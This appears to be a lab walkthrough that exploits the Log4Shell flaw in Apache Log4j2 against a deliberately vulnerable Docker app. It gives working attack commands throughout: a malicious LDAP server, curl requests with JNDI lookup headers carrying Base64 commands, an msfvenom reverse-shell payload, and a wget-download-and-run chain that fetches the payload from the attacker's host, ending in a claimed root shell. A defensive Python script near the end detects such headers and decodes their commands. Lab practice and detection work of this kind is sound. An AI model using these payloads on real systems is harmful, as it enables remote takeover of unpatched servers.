Created
January 6, 2022 14:32
Description: Apache Log4j2 versions up to and including 2.14.1 (excluding security release 2.12.2) are vulnerable to a remote code execution vulnerability. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Prerequisite
Docker must be installed. Go to the link below to see how to install Docker on Kali Linux:
https://youtu.be/xN2JGqiqgow
Steps
A) Download the log4j vulnerable app from the GitHub link below:
https://github.com/simrotion13/log4shell-vulnerable-app
$ cd log4j
$ git clone https://github.com/simrotion13/log4shell-vulnerable-app
$ sudo docker build . -t vulnerable-app
This will take time...
# sudo docker run -p 8080:8080 --name vulnerable-app vulnerable-app
Run the 'docker ps' command to check the status of the new Docker instance:
# sudo docker ps
B) Run the malicious LDAP server. I already downloaded it on the local machine.
# java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
# java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.17.0.1 -p 8888
C) The below is the syntax to exploit the vulnerability:
curl <vulnerable server ip> -H 'X-Api-Version: ${jndi:ldap://ldapserverip:1389/Basic/Command/Base64/<command in base64>}'
Let's first confirm that no file named pwned is present in the /tmp directory of the target machine:
sudo docker exec vulnerable-app ls /tmp
D) Run the command below, which creates the pwned file in the /tmp folder on the target machine:
curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZA==}'
Let's try to get Remote Code Execution on the target machine.
1. Create a reverse shell file using msfvenom:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.17.0.1 LPORT=4444 -f elf -o ./rev.elf
2. Prepare a local server using Python on our attacking machine:
sudo python3 -m http.server 8081
3. Encode the command below:
wget http://172.17.0.1:8081/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf
This command downloads the rev.elf file from the attacker machine to the target machine under the /tmp directory and runs it.
4. Copy the base64 output:
d2dldCBodHRwOi8vMTcyLjE3LjAuMTo4MDgxL3Jldi5lbGYgLU8gL3RtcC9yZXYuZWxmICYmIGNobW9kICt4IC90bXAvcmV2LmVsZiAmJiAvdG1wL3Jldi5lbGY=
5. Run the command below:
$ curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwOi8vMTcyLjE3LjAuMTo4MDgxL3Jldi5lbGYgLU8gL3RtcC9yZXYuZWxmICYmIGNobW9kICt4IC90bXAvcmV2LmVsZiAmJiAvdG1wL3Jldi5lbGY=}'
We have performed RCE on the target machine and got root access.
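The lookups in steps C, D and 5 all share one shape, so here is a defender-side triage script (an added example, not part of this gist) that scans captured request headers for a ${jndi:...} lookup, pulls out the LDAP host and port, and decodes the Base64 command segment of the JNDIExploit URL format used above, so an analyst can see what a logged request would have run. The request records are constructed sample data, not logs from the vulnerable app.

```python
import base64
import re

# A JNDI lookup in the form shown on this page: ${jndi:<scheme>://<host>[:<port>]<path>}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)
# JNDIExploit-style path carrying a Base64-encoded shell command.
B64_CMD_RE = re.compile(r"/Basic/Command/Base64/(?P<b64>[A-Za-z0-9+/=]+)")


def analyse_header(value):
    """Return None if the value holds no JNDI lookup, else a dict describing it."""
    m = JNDI_RE.search(value)
    if m is None:
        return None
    finding = {
        "scheme": m.group("scheme").lower(),
        "host": m.group("host"),
        "port": int(m.group("port")) if m.group("port") else None,
        "command": None,
    }
    c = B64_CMD_RE.search(m.group("path"))
    if c:
        try:
            finding["command"] = base64.b64decode(c.group("b64"), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: malformed Base64, leave command=None
            pass
    return finding


def triage(requests):
    """Scan (source_ip, header_name, header_value) triples; return one finding per suspicious header."""
    alerts = []
    for src, name, value in requests:
        f = analyse_header(value)
        if f is not None:
            alerts.append({"src": src, "header": name, **f})
    return alerts


# Constructed sample: a benign request and one carrying the lookup from step D of this gist.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "X-Api-Version", "1.0"),
    ("172.17.0.1", "X-Api-Version",
     "${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZA==}"),
]

if __name__ == "__main__":
    for a in triage(SAMPLE_REQUESTS):
        print(f"{a['src']} {a['header']}: {a['scheme']}://{a['host']}:{a['port']} command={a['command']!r}")
```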
Thanks for watching